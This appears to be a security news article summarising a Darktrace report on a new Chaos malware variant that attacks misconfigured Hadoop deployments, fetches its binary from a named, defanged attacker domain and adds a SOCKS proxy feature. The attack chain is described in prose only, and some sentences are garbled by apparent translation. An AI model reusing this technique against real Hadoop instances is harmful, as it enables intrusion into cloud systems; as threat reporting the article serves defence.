Cybersecurity researchers have identified a new variant of the malware called chaosIt is capable of affecting misconfigured cloud deployments, which shows the expansion of the botnet’s targeting infrastructure.
“Chaos malware is increasingly targeting misconfigured cloud deployments, moving beyond its traditional focus on routers and edge devices,” Darktrace said in a new report.
Chaos was first documented by Lumen Black Lotus Labs in September 2022, in which it was described as a cross-platform malware targeting Windows and Linux environments to run remote shell commands, drop additional modules, propagate to other hosts by using SSH keys, mine cryptocurrency, and launch distributed denial-of-service (DDoS) attacks via HTTP, TLS, TCP, UDP, and WebSocket. Is capable of.
This malware is believed to be an evolution of another DDoS malware known as Kaiji that exposed misconfigured Docker instances. At the moment it is not known who is behind the operation, but the presence of Chinese language characters and the use of China-based infrastructure suggest that the threat actor may be of Chinese origin.
Darktrace said it identified the new variant last month targeting its honeypot network by intentionally misconfiguring Hadoop instances that enable remote code execution on the service. In the attack observed by the cybersecurity company, the intrusion began with an HTTP request to a Hadoop deployment to create a new application.
The application, for its part, embeds a sequence of shell commands to retrieve the Chaos Agent binary from an attacker-controlled server (“pan.tenire[.]com”), set permissions to allow all users to read, modify, or run it (“chmod 777”), and then actually execute the binary and delete the artifact from disk to reduce the forensic trail.
An interesting aspect of the attack is that the domain was previously used in connection with an email phishing campaign conducted by Chinese cybercrime group Silver Fox to distribute fake documents and ValleyRAT malware. The campaign was given the codename Operation Silk Lure by Secret Labs in October 2025.
64-bit ELF is a reorganized and updated version of Binary Chaos that reworks many of its functions while retaining most of its core feature set. One of the more significant changes, however, relates to the removal of functions that enabled it to spread via SSH and exploit router vulnerabilities.
They are being replaced by a new SOCKS proxy feature that allows compromised systems to be used to transport traffic, thereby hiding the true origin of malicious activity and making it harder for defenders to detect and stop the attack.
“In addition, several functions previously thought to be inherited from Kaiji have also been changed, suggesting that threat actors have either rewritten the malware or extensively repurposed it,” Darktrace said.
The addition of the proxy feature is likely a sign that the threat actors behind the malware want to further monetize the botnet beyond cryptocurrency mining and DDoS-for-hire, and keep up with their competitors in the cybercrime market by offering a diverse list of illegal services.
Darktrace concluded, “Although Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expanding their botnets and increasing the capabilities at their disposal.” “The recent addition of proxy services as core features in botnets like AISURU and Chaos shows that denial of service is no longer the only risk facing these botnet organizations and their security teams.”
